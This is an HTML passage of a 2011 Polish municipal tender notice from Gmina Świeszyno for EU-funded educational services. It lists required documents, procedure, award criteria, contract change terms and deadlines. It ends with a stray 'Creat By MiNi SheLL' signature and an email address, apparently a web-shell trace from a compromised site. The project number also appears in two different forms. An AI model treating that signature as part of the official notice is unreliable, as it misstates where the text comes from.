<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony i podpisany formularz ofertowy. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. b) W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania i złożenia oferty. c) Jeżeli w miejscu zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w III.4.3.1), zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: a) zmiana terminu wykonania zamówienia w przypadku zmiany umowy o dofinansowanie projektu Nr KSI WND-POKL.09.01.02-32-106/11. Powyższa zmiana umowy może zostać dokonana pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany oraz wyrażenia zgody przez Zamawiającego na tę zmianę. b) zmiana osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności w przypadku choroby osoby prowadzącej zajęcia lub innych zdarzeń losowych uniemożliwiających prowadzenie zajęć. W przypadku zmiany osoby prowadzącej zajęcia, nowa osoba musi spełniać wymagania określone w niezbędnych. III.3 SIWZ. Powyższe zmiany umowy mogą zostać dokonane pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmiany, przedłożenia dokumentów potwierdzających kwalifikacje osoby prowadzącej zajęcia oraz wyrażenia zgody przez Zamawiającego na tę zmianę. c) zmiana okresu realizacji umowy jest możliwa w przypadku zmian w projekcie d) zmniejszenie wartości umowy jest możliwe w przypadku zmian w projekcie e) w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy f) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy. Pozostałe zmiany: a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ b) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swieszyno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świeszyno - Zespół Oświaty Samorządowej pokój nr 10, Świeszyno 71, 76 - 024 Świeszyno; tel: 94 31 60 130; e-mail: zos@swieszyno.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2011 godzina 10:00, miejsce: Sekretariat Urzędu Gminy Świeszyno, Świeszyno 71, 76 - 024 Świeszyno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 - Priorytet IX. Rozwój wykształcenia i kompetencji w regionach Działanie: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. Nr KSI: WND-POKL.09.01.02-32-126/11.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com